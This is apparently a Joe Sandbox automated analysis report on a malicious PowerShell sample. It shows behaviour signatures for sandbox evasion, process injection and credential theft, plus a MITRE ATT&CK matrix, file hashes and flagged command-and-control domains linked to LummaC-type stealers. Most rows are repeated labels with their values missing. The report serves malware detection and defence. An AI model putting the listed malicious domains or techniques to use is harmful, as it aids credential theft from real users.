| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
Malware Analysis System Evasion | |
|---|
| Source: | WMI Queries: | ||
| Source: | System information queried: | Jump to behavior | ||
| Source: | Thread delayed: | Jump to behavior | ||
| Source: | Window / User API: | Jump to behavior | ||
| Source: | Window / User API: | Jump to behavior | ||
| Source: | Thread sleep time: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | WMI Queries: | ||
| Source: | Thread delayed: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | Binary or memory string: | ||
| Source: | Binary or memory string: | ||
| Source: | Binary or memory string: | ||
| Source: | Binary or memory string: | ||
| Source: | Binary or memory string: | ||
| Source: | Binary or memory string: | ||
| Source: | Binary or memory string: | ||
| Source: | Binary or memory string: | ||
| Source: | Binary or memory string: | ||
| Source: | Binary or memory string: | ||
| Source: | Binary or memory string: | ||
| Source: | Binary or memory string: | ||
| Source: | Binary or memory string: | ||
| Source: | Binary or memory string: | ||
| Source: | Binary or memory string: | ||
| Source: | Binary or memory string: | ||
| Source: | Binary or memory string: | ||
| Source: | Binary or memory string: | ||
| Source: | Binary or memory string: | ||
| Source: | Binary or memory string: | ||
| Source: | Binary or memory string: | ||
| Source: | Binary or memory string: | ||
| Source: | Binary or memory string: | ||
| Source: | Binary or memory string: | ||
| Source: | Binary or memory string: | ||
| Source: | Binary or memory string: | ||
| Source: | Binary or memory string: | ||
| Source: | Binary or memory string: | ||
| Source: | Binary or memory string: | ||
| Source: | Binary or memory string: | ||
| Source: | Process information queried: | Jump to behavior | ||
| Source: | Code function: | 4_2_004402D0 | |
| Source: | Process token adjusted: | Jump to behavior | ||
HIPS / PFW / Operating System Protection Evasion | |
|---|
| Source: | Memory written: | Jump to behavior | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | Memory written: | Jump to behavior | ||
| Source: | Memory written: | Jump to behavior | ||
| Source: | Memory written: | Jump to behavior | ||
| Source: | Memory written: | Jump to behavior | ||
| Source: | Memory written: | Jump to behavior | ||
| Source: | Memory written: | Jump to behavior | ||
| Source: | Process created: | Jump to behavior | ||
| Source: | Process created: | Jump to behavior | ||
| Source: | Process created: | Jump to behavior | ||
| Source: | Process created: | Jump to behavior | ||
| Source: | Queries volume information: | Jump to behavior | ||
| Source: | Queries volume information: | Jump to behavior | ||
| Source: | Queries volume information: | Jump to behavior | ||
| Source: | Queries volume information: | Jump to behavior | ||
| Source: | Queries volume information: | Jump to behavior | ||
| Source: | Queries volume information: | Jump to behavior | ||
| Source: | Queries volume information: | Jump to behavior | ||
| Source: | Queries volume information: | Jump to behavior | ||
| Source: | Queries volume information: | Jump to behavior | ||
| Source: | Queries volume information: | Jump to behavior | ||
| Source: | Queries volume information: | Jump to behavior | ||
| Source: | Queries volume information: | Jump to behavior | ||
| Source: | Queries volume information: | Jump to behavior | ||
| Source: | Queries volume information: | Jump to behavior | ||
| Source: | Key value queried: | Jump to behavior | ||
| Source: | Binary or memory string: | ||
| Source: | Binary or memory string: | ||
| Source: | Binary or memory string: | ||
| Source: | Binary or memory string: | ||
| Source: | Binary or memory string: | ||
| Source: | WMI Queries: | ||
Stealing of Sensitive Information | |
|---|
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | Directory queried: | Jump to behavior | ||
| Source: | Directory queried: | Jump to behavior | ||
| Source: | Directory queried: | Jump to behavior | ||
| Source: | Directory queried: | Jump to behavior | ||
| Source: | Directory queried: | Jump to behavior | ||
| Source: | Directory queried: | Jump to behavior | ||
| Source: | Directory queried: | Jump to behavior | ||
| Source: | Directory queried: | Jump to behavior | ||
| Source: | Directory queried: | Jump to behavior | ||
| Source: | Directory queried: | Jump to behavior | ||
| Source: | Directory queried: | Jump to behavior | ||
| Source: | Directory queried: | Jump to behavior | ||
Remote Access Functionality | |
|---|
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 12 Windows Management Instrumentation | 1 DLL Side-Loading | 211 Process Injection | 1 Masquerading | 2 OS Credential Dumping | 231 Security Software Discovery | Remote Services | 1 Screen Capture | 21 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features |
| Credentials | Domains | Default Accounts | 1 PowerShell | Boot or Logon Initialization Scripts | 1 DLL Side-Loading | 231 Virtualization/Sandbox Evasion | LSASS Memory | 1 Process Discovery | Remote Desktop Protocol | 1 Archive Collected Data | 1 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service |
| Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | Logon Script (Windows) | 211 Process Injection | Security Account Manager | 231 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | 41 Data from Local System | 3 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact |
| Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 11 Deobfuscate/Decode Files or Information | NTDS | 1 Application Window Discovery | Distributed Component Object Model | 3 Clipboard Data | 114 Application Layer Protocol | Traffic Duplication | Data Destruction |
| Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 3 Obfuscated Files or Information | LSA Secrets | 12 File and Directory Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact |
| Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 DLL Side-Loading | Cached Domain Credentials | 32 System Information Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop |
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
InternetThis section contains all screenshots as thumbnails, including those not shown in the slideshow.
| Source | Detection | Scanner | Label | Link |
|---|---|---|---|---|
| 7% | Virustotal | Browse | ||
| 11% | ReversingLabs |
⊘No Antivirus matches
⊘No Antivirus matches
⊘No Antivirus matches
| Source | Detection | Scanner | Label | Link |
|---|---|---|---|---|
| 100% | Avira URL Cloud | malware | ||
| 100% | Avira URL Cloud | malware | ||
| 100% | Avira URL Cloud | malware | ||
| 0% | Avira URL Cloud | safe | ||
| 100% | Avira URL Cloud | malware | ||
| 100% | Avira URL Cloud | malware | ||
| 0% | Avira URL Cloud | safe | ||
| 0% | Avira URL Cloud | safe | ||
| 100% | Avira URL Cloud | malware | ||
| 0% | Avira URL Cloud | safe | ||
| 0% | Avira URL Cloud | safe | ||
| 0% | Avira URL Cloud | safe | ||
| 100% | Avira URL Cloud | malware | ||
| 100% | Avira URL Cloud | malware | ||
| 100% | Avira URL Cloud | malware | ||
| 0% | Avira URL Cloud | safe | ||
| 0% | Avira URL Cloud | safe | ||
| 0% | Avira URL Cloud | safe | ||
| 0% | Avira URL Cloud | safe | ||
| 0% | Avira URL Cloud | safe |
| Name | IP | Active | Malicious | Antivirus Detection | Reputation |
|---|---|---|---|---|---|
| aleksandr-block.com | 188.114.96.3 | true | true | unknown | |
| steamcommunity.com | 104.102.49.254 | true | false | high | |
| finickypwk.lat | unknown | unknown | true | unknown | |
| washyceehsu.lat | unknown | unknown | true | unknown | |
| kickykiduz.lat | unknown | unknown | true | unknown | |
| bloodyswif.lat | unknown | unknown | true | unknown | |
| shoefeatthe.lat | unknown | unknown | true | unknown | |
| savorraiykj.lat | unknown | unknown | true | unknown | |
| miniatureyu.lat | unknown | unknown | true | unknown | |
| curtainykeo.lat | unknown | unknown | true | unknown | |
| leggelatez.lat | unknown | unknown | true | unknown |
| Name | Malicious | Antivirus Detection | Reputation |
|---|---|---|---|
| false | high | ||
| true |
| unknown | |
| true |
| unknown | |
| true |
| unknown | |
| true |
| unknown | |
| true |
| unknown | |
| true |
| unknown | |
| true |
| unknown | |
| true |
| unknown | |
| true |
| unknown | |
| true |
| unknown |
| Name | Source | Malicious | Antivirus Detection | Reputation |
|---|---|---|---|---|
| false | high | |||
| false | high | |||
| false | high | |||
| false | high | |||
| false | high | |||
| false | high | |||
| false | high | |||
| false |
| unknown | ||
| false | high | |||
| false | high | |||
| false | high | |||
| false |
| unknown | ||
| false |
| unknown | ||
| false |
| unknown | ||
| false |
| unknown | ||
| false |
| unknown | ||
| false | high | |||
| false | high | |||
| false |
| unknown | ||
| false | high | |||
| false |
| unknown | ||
| false | high | |||
| false | high | |||
| false |
| unknown | ||
| false | high | |||
| false |
| unknown |
- No. of IPs < 25%
- 25% < No. of IPs < 50%
- 50% < No. of IPs < 75%
- 75% < No. of IPs
| IP | Domain | Country | Flag | ASN | ASN Name | Malicious |
|---|---|---|---|---|---|---|
| 188.114.96.3 | aleksandr-block.com | European Union | 13335 | CLOUDFLARENETUS | true | |
| 104.102.49.254 | steamcommunity.com | United States | 16625 | AKAMAI-ASUS | false |
| Joe Sandbox version: | 42.0.0 Malachite |
| Analysis ID: | 1590524 |
| Start date and time: | 2025-01-14 08:26:11 +01:00 |
| Joe Sandbox product: | CloudBasic |
| Overall analysis duration: | 0h 5m 22s |
| Hypervisor based Inspection enabled: | false |
| Report type: | full |
| Cookbook file name: | default.jbs |
| Analysis system description: | Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01 |
| Number of analysed new started processes analysed: | 11 |
| Number of new started drivers analysed: | 0 |
| Number of existing processes analysed: | 0 |
| Number of existing drivers analysed: | 0 |
| Number of injected processes analysed: | 0 |
| Technologies: |
|
| Analysis Mode: | default |
| Analysis stop reason: | Timeout |
| Sample name: | 92.255.57_2.112.ps1 |
| Detection: | MAL |
| Classification: | mal100.troj.spyw.evad.winPS1@10/10@11/2 |
| EGA Information: |
|
| HCA Information: |
|
| Cookbook Comments: |
|
- Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
- Excluded IPs from analysis (whitelisted): 20.42.65.92, 40.126.32.140, 20.109.210.53, 4.175.87.197, 13.107.246.45
- Excluded domains from analysis (whitelisted): onedsblobprdeus17.eastus.cloudapp.azure.com, ocsp.digicert.com, login.live.com, slscr.update.microsoft.com, otelrules.azureedge.net, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
- Not all processes where analyzed, report is missing behavior information
- Report size getting too big, too many NtOpenKeyEx calls found.
- Report size getting too big, too many NtQueryValueKey calls found.
- Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
| Time | Type | Description |
|---|---|---|
| 02:27:10 | API Interceptor | |
| 02:27:11 | API Interceptor | |
| 02:27:24 | API Interceptor |
| Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
|---|---|---|---|---|---|---|
| 188.114.96.3 | Get hash | malicious | FormBook | Browse |
| |
| Get hash | malicious | FormBook | Browse |
| ||
| Get hash | malicious | FormBook | Browse |
| ||
| Get hash | malicious | Unknown | Browse |
| ||
| Get hash | malicious | FormBook | Browse |
| ||
| Get hash | malicious | FormBook | Browse |
| ||
| Get hash | malicious | FormBook | Browse |
| ||
| Get hash | malicious | FormBook | Browse |
| ||
| Get hash | malicious | FormBook | Browse |
| ||
| Get hash | malicious | HTMLPhisher | Browse |
| ||
| 104.102.49.254 | Get hash | malicious | Socks5Systemz | Browse |
| |
| Get hash | malicious | Unknown | Browse |
|
| Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
|---|---|---|---|---|---|---|
| steamcommunity.com | Get hash | malicious | LummaC | Browse |
| |
| Get hash | malicious | LummaC | Browse |
| ||
| Get hash | malicious | LummaC | Browse |
| ||
| Get hash | malicious | LummaC | Browse |
| ||
| Get hash | malicious | LummaC | Browse |
| ||
| Get hash | malicious | LummaC | Browse |
| ||
| Get hash | malicious | LummaC, Amadey, Babadeda, DanaBot, KeyLogger, LummaC Stealer, Poverty Stealer | Browse |
| ||
| Get hash | malicious | LummaC | Browse |
| ||
| Get hash | malicious | LummaC | Browse |
| ||
| Get hash | malicious | LummaC | Browse |
|
| Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
|---|---|---|---|---|---|---|
| CLOUDFLARENETUS | Get hash | malicious | Phisher | Browse |
| |
| Get hash | malicious | DBatLoader, PureLog Stealer, Snake Keylogger, VIP Keylogger | Browse |
| ||
| Get hash | malicious | Unknown | Browse |
| ||
| Get hash | malicious | Unknown | Browse |
| ||
| Get hash | malicious | Unknown | Browse |
| ||
| Get hash | malicious | EvilProxy, HTMLPhisher | Browse |
| ||
| Get hash | malicious | HTMLPhisher | Browse |
| ||
| Get hash | malicious | Unknown | Browse |
| ||
| Get hash | malicious | Unknown | Browse |
| ||
| Get hash | malicious | Unknown | Browse |
| ||
| AKAMAI-ASUS | Get hash | malicious | HTMLPhisher | Browse |
| |
| Get hash | malicious | Unknown | Browse |
| ||
| Get hash | malicious | HTMLPhisher | Browse |
| ||
| Get hash | malicious | LummaC | Browse |
| ||
| Get hash | malicious | HTMLPhisher | Browse |
| ||
| Get hash | malicious | DanaBot, Vidar | Browse |
| ||
| Get hash | malicious | Unknown | Browse |
| ||
| Get hash | malicious | HTMLPhisher | Browse |
| ||
| Get hash | malicious | Unknown | Browse |
| ||
| Get hash | malicious | Mirai, Okiru | Browse |
|
| Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
|---|---|---|---|---|---|---|
| a0e9f5d64349fb13191bc781f81f42e1 | Get hash | malicious | DBatLoader | Browse |
| |
| Get hash | malicious | DBatLoader | Browse |
| ||
| Get hash | malicious | DBatLoader | Browse |
| ||
| Get hash | malicious | DBatLoader | Browse |
| ||
| Get hash | malicious | DBatLoader | Browse |
| ||
| Get hash | malicious | DBatLoader | Browse |
| ||
| Get hash | malicious | DBatLoader, PureLog Stealer, Snake Keylogger, VIP Keylogger | Browse |
| ||
| Get hash | malicious | Unknown | Browse |
| ||
| Get hash | malicious | LummaC | Browse |
|
⊘No context
C:\ProgramData\Microsoft\Windows\WER\ReportQueue\Critical_powershell.exe_a2abdbfe428d67222a333c07b1678b548034_00000000_5eafda4c-73f2-47a9-8cd5-03beb515af73\Report.wer
Download File
| Process: | C:\Windows\System32\wermgr.exe |
| File Type: | |
| Category: | dropped |
| Size (bytes): | 65536 |
| Entropy (8bit): | 0.5322122137743448 |
| Encrypted: | false |
| SSDEEP: | 96:FmhFr3FwjfrxYid6zRH3Uje0e35/3oo16l51QXIGZAX/d5FMT2SlPkpXmTA/f/V3:Ax3EfmG6zR30md8cAzuiF3Z24lO8 |
| MD5: | 32991AA0DA6D45CD9754C7F8D70F683A |
| SHA1: | CCA785411DB556A2CB72A443D8A529465CE4653B |
| SHA-256: | B177EF80A3569CA4B52DDAD88A57785F280937FECB2C79D589F7121CDFAC81F5 |
| SHA-512: | 6408477C72EEAD87AABA16CB9E7A46459BBF47BEE055A2F36896BB1275EDC9108F145D1F7879C6D485611156BBD372C08C5930D8B93199CABDF3AEA6F049F943 |
| Malicious: | false |
| Reputation: | low |
| Preview: |
| Process: | C:\Windows\System32\wermgr.exe |
| File Type: | |
| Category: | dropped |
| Size (bytes): | 7288 |
| Entropy (8bit): | 3.7391905680956112 |
| Encrypted: | false |
| SSDEEP: | 192:R6l7wVeJr3x6Y9LxHbgmft887cpV3aX7m:R6lXJrx6YBxHbgmftZoCy |
| MD5: | 69D682DB088C2719B46A65B43E427F54 |
| SHA1: | A8AACD59B448FBA7E3BDF9DFAC16B9E430498CB9 |
| SHA-256: | E879F748EF2C3004A3CAD6FC479BD117FA4581993D885CC0285A6E4857227FE2 |
| SHA-512: | D1B57D5D6CD5F6ED22968485FC7892D3497AF023462CADBD512DCBE7CE01F8282B1C66A1324947312EB0C518F9F24C350A68584634BAB43D24EBEBCAB0434915 |
| Malicious: | false |
| Reputation: | low |
| Preview: |
| Process: | C:\Windows\System32\wermgr.exe |
| File Type: | |
| Category: | dropped |
| Size (bytes): | 4905 |
| Entropy (8bit): | 4.688993761991504 |
| Encrypted: | false |
| SSDEEP: | 96:uIjfBI7MwW7VmJFKloF1cmFzcWTzF1cmF2ufnd:uIlYMwW7A4Jq7UNufd |
| MD5: | 43E5AD6642DD1F73286C4AE7DBA9DDDF |
| SHA1: | 46AE11BE1634A27AB020115052AA9C18A4ED998A |
| SHA-256: | CAFFD14C85E3869080F87F36620803D3B3DBD26926576AB84EBE5B3C17FDD401 |
| SHA-512: | 0D9BFCC14F5379245FE753F272AE87ACB6D0C4E485CAB1B816B190AE799B169167B1E885422D446797CCBC018D642FA95355F28213B7B1D1A2599E3B25253DC8 |
| Malicious: | false |
| Reputation: | low |
| Preview: |
| Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| File Type: | |
| Category: | dropped |
| Size (bytes): | 11608 |
| Entropy (8bit): | 4.890472898059848 |
| Encrypted: | false |
| SSDEEP: | 192:6xoe5qpOZxoe54ib4ZVsm5emdqVFn3eGOVpN6K3bkkjo5OgkjDt4iWN3yBGHVQ9R:9rib4ZmVoGIpN6KQkj2Fkjh4iUxsT6YP |
| MD5: | 8A4B02D8A977CB929C05D4BC2942C5A9 |
| SHA1: | F9A6426CAF2E8C64202E86B07F1A461056626BEA |
| SHA-256: | 624047EB773F90D76C34B708F48EA8F82CB0EC0FCF493CA2FA704FCDA7C4B715 |
| SHA-512: | 38697525814CDED7B27D43A7B37198518E295F992ECB255394364EC02706443FB3298CBBAA57629CCF8DDBD26FD7CAAC44524C4411829147C339DD3901281AC2 |
| Malicious: | false |
| Reputation: | moderate, very likely benign file |
| Preview: |
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Download File
| Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| File Type: | |
| Category: | dropped |
| Size (bytes): | 64 |
| Entropy (8bit): | 1.1628158735648508 |
| Encrypted: | false |
| SSDEEP: | 3:NlllulLhwlz:NllUO |
| MD5: | F442CD24937ABD508058EA44FD91378E |
| SHA1: | FDE63CECA441AA1C5C9C401498F9032A23B38085 |
| SHA-256: | E2960AF08E2EE7C9C72EEA31DBBFE1B55B9BF84DE2DD7BB7204487E6AF37B8F6 |
| SHA-512: | 927E2EEA0BB3FC3D3A0DA7F45644F594CE29F11D90A84B005D723500258DE9E8B3780EB87242F4C62B64B9FEEA1869FC16076FA3AC89EC34E0546CDE1BEF7631 |
| Malicious: | false |
| Preview: |
| Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| File Type: | |
| Category: | dropped |
| Size (bytes): | 60 |
| Entropy (8bit): | 4.038920595031593 |
| Encrypted: | false |
| SSDEEP: | 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX |
| MD5: | D17FE0A3F47BE24A6453E9EF58C94641 |
| SHA1: | 6AB83620379FC69F80C0242105DDFFD7D98D5D9D |
| SHA-256: | 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 |
| SHA-512: | 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82 |
| Malicious: | false |
| Preview: |
| Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| File Type: | |
| Category: | dropped |
| Size (bytes): | 60 |
| Entropy (8bit): | 4.038920595031593 |
| Encrypted: | false |
| SSDEEP: | 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX |
| MD5: | D17FE0A3F47BE24A6453E9EF58C94641 |
